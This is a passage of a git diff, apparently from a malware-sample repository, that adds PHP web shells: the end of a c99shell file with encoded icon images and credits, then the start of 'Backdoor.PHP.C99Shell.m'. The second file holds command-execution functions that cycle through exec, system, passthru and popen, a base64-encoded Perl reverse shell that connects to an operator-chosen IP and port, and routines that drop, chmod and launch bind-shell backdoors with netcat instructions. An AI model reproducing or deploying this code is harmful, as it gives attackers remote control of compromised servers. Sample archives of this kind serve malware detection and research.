+"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/". +"AQEAOw==", +"sql_button_empty"=> +"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA". +"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==", +"sql_button_insert"=> +"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA". +"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=", +"up"=> +"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg". +"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV". +"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==", +"write"=> +"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze". +"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61". +"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==", +"ext_asp"=> +"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/". +"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI". +"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=", +"ext_mp3"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". +"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". +"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", +"ext_avi"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM". +"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4". +"PYXCyg+V2i44XeRmSfYqsGhAAgA7", +"ext_cgi"=> +"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9". +"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6". +"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S". +"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ". +"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM". +"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD". +"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi". +"RYtMAgEAOw==", +"ext_cmd"=> +"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI". +"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN". +"dmrYAMn1onq/YKpjvEgAADs=", +"ext_cpp"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC". +"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra". +"Eq7YrLDE7a4SADs=", +"ext_ini"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL". +"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM". +"SnEjgPVarHEHgrB43JvszsQEADs=", +"ext_diz"=> +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs". +"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv". +"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3". +"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr". +"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX". +"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA". +"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW". +"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK". +"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm". +"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg". +"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF". +"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA". +"Ow==", +"ext_doc"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR". +"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq". +"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=", +"ext_exe"=> +"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7". +"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt". +"xhIAOw==", +"ext_h"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB". +"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo". +"Wq/NknbbSgAAOw==", +"ext_hpp"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF". +"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR". +"UqUagnbLdZa+YFcCADs=", +"ext_htaccess"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6". +"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ". +"AAA7", +"ext_html"=> +"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz". +"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P". +"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk". +"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR". +"ADs=", +"ext_jpg"=> +"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci". +"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd". +"FxEAOw==", +"ext_js"=> +"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH". +"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs". +"a00AjYYBbc/o9HjNniUAADs=", +"ext_lnk"=> +"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO". +"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi". +"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk". +"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG". +"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5". +"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf". +"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ". +"ADs=", +"ext_log"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN". +"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==", +"ext_php"=> +"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg". +"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==", +"ext_pl"=> +"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo". +"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7", +"ext_swf"=> +"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O". +"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA". +"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC". +"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=", +"ext_tar"=> +"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC". +"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF". +"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD". +"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p". +"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg". +"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd". +"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB". +"u4tLAgEAOw==", +"ext_txt"=> +"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ". +"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7". +"UpPWG3Ig6Hq/XmRjuZwkAAA7", +"ext_wri"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao". +"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=", +"ext_xml"=> +"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA". +"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx". +"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ". +"IQA7" +); + //For simple size- and speed-optimization. + $imgequals = array( + "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"), + "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"), + "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"), + "ext_html"=>array("ext_html","ext_htm"), + "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"), + "ext_lnk"=>array("ext_lnk","ext_url"), + "ext_ini"=>array("ext_ini","ext_css","ext_inf"), + "ext_doc"=>array("ext_doc","ext_dot"), + "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"), + "ext_wri"=>array("ext_wri","ext_rtf"), + "ext_swf"=>array("ext_swf","ext_fla"), + "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"), + "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so") + ); + if (!$getall) + { + header("Content-type: image/gif"); + header("Cache-control: public"); + header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); + header("Cache-control: max-age=".(60*60*24*7)); + header("Last-Modified: ".date("r",filemtime(__FILE__))); + foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}} + if (empty($arrimg[$img])) {$img = "small_unk";} + if (in_array($img,$ext_tar)) {$img = "ext_tar";} + echo base64_decode($arrimg[$img]); + } + else + { + foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($arrimg[$d])) {echo("Warning! Remove \$arrimg[".$d."]
    ");}}}} + natsort($arrimg); + $k = array_keys($arrimg); + echo "
    "; + foreach ($k as $u) {echo $u.":
    ";} + echo "
    "; + } + exit; +} +if ($act == "about") {echo "
    Credits:
    Idea, leading and coding by tristram[CCTeaM].
    Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].
    Thanks all who report bugs.
    All bugs send to tristram's ICQ #656555 .
    ";} +?> +
    + +

    :: Command execute ::

    Enter:
     
    Select:
     
    +
    + + + + + +
    :: Search ::
      - regexp 

    :: Upload ::
     
    +
    :: Make Dir ::
     
    :: Make File ::
     
    +
    :: Go Dir ::
     
    :: Go File ::
     
    +

    --[ c99shell v. powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: ]--

    + \ No newline at end of file diff --git a/PHP/Backdoor.PHP.C99Shell.m b/PHP/Backdoor.PHP.C99Shell.m new file mode 100644 index 00000000..cc5f4514 --- /dev/null +++ b/PHP/Backdoor.PHP.C99Shell.m @@ -0,0 +1,3556 @@ +&1","r"))) { +return 126; +} +while (!feof($p)) { +$line=fgets($p,1000); +$out .= $line; +} +pclose($p); +return $out; +} +}else{ +function myshellexec($cmd) +{ + global $disablefunc; + $result = ""; + if (!empty($cmd)) + { + if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} + elseif (($result = `$cmd`) !== FALSE) {} + elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_resource($fp = popen($cmd,"r"))) + { + $result = ""; + while(!feof($fp)) {$result .= fread($fp,1024);} + pclose($fp); + } + } + return $result; +} +} +} + +$proxy_shit=""; + +$back_connect_c=""; + +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiOyc7DQokc3lzdGVtMT0gJ2VjaG8gImBpZGAiOyc7DQokc3lzdGVtMj0gJ2VjaG8gImBwd2RgIjsnOw0KJHN5c3RlbTM9ICdlY2hvICJgd2hvYW1pYEBgaG9zdG5hbWVgOn4gPiI7JzsNCiRzeXN0ZW00PSAnL2Jpbi9zaCc7DQokMD0kY21kOw0KJHRhcmdldD0kQVJHVlswXTsNCiRwb3J0PSRBUkdWWzFdOw0KJGlhZGRyPWluZXRfYXRvbigkdGFyZ2V0KSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQokcGFkZHI9c29ja2FkZHJfaW4oJHBvcnQsICRpYWRkcikgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHByb3RvPWdldHByb3RvYnluYW1lKCd0Y3AnKTsNCnNvY2tldChTT0NLRVQsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCmNvbm5lY3QoU09DS0VULCAkcGFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCm9wZW4oU1RESU4sICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERPVVQsICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERFUlIsICI+JlNPQ0tFVCIpOw0KcHJpbnQgIlxuXG46OiB3NGNrMW5nLXNoZWxsIChQcml2YXRlIEJ1aWxkIHYwLjMpIHJldmVyc2Ugc2hlbGwgOjpcblxuIjsNCnByaW50ICJcblN5c3RlbSBJbmZvOiAiOyANCnN5c3RlbSgkc3lzdGVtKTsNCnByaW50ICJcbllvdXIgSUQ6ICI7IA0Kc3lzdGVtKCRzeXN0ZW0xKTsNCnByaW50ICJcbkN1cnJlbnQgRGlyZWN0b3J5OiAiOyANCnN5c3RlbSgkc3lzdGVtMik7DQpwcmludCAiXG4iOw0Kc3lzdGVtKCRzeXN0ZW0zKTsgc3lzdGVtKCRzeXN0ZW00KTsNCmNsb3NlKFNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; + +$backdoor=""; + +function checkproxyhost(){ +$host = getenv("HTTP_HOST"); +$filename = '/tmp/.setan/xh'; +if (file_exists($filename)) { +$_POST['proxyhostmsg']="

    Success!

    $host:6543

    Note: If '$host' have a good firewall or IDS installed on their server, it will probably catch this or stop it from ever opening a port and you won't be able to connect to this proxy.

    "; +} else { +$_POST['proxyhostmsg']="

    Failed!

    Note: If for some reason we would not create and extract the need proxy files in '/tmp' this will make this fail.

    "; + } +} + +if (!empty($_POST['backconnectport']) && ($_POST['use']=="shbd")) +{ + $ip = gethostbyname($_SERVER["HTTP_HOST"]); + $por = $_POST['backconnectport']; + if(is_writable(".")){ + cfb("shbd",$backdoor); + ex("chmod 777 shbd"); + $cmd = "./shbd $por"; + exec("$cmd > /dev/null &"); + $scan = myshellexec("ps aux"); + if(eregi("./shbd $por",$scan)){ $data = ("\n

    Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n
    Process not found running, backdoor not setup successfully."); } + $_POST['backcconnmsg']="To connect, use netcat and give it the command 'nc $ip $por'.$data"; + }else{ + cfb("/tmp/shbd",$backdoor); + ex("chmod 777 /tmp/shbd"); + $cmd = "./tmp/shbd $por"; + exec("$cmd > /dev/null &"); + $scan = myshellexec("ps aux"); + if(eregi("./shbd $por",$scan)){ $data = ("\n

    Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n
    Process not found running, backdoor not setup successfully."); } + $_POST['backcconnmsg']="To connect, use netcat and give it the command 'nc $ip $por'.$data"; +} +} + +if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="Perl")) +{ + if(is_writable(".")){ + cf("back",$back_connect); + $p2=which("perl"); + $blah = ex($p2." back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &"); + $_POST['backcconnmsg']="Trying to connect to ".$_POST['backconnectip']." on port ".$_POST['backconnectport']."."; + if (file_exists("back")) { unlink("back"); } + }else{ + cf("/tmp/back",$back_connect); + 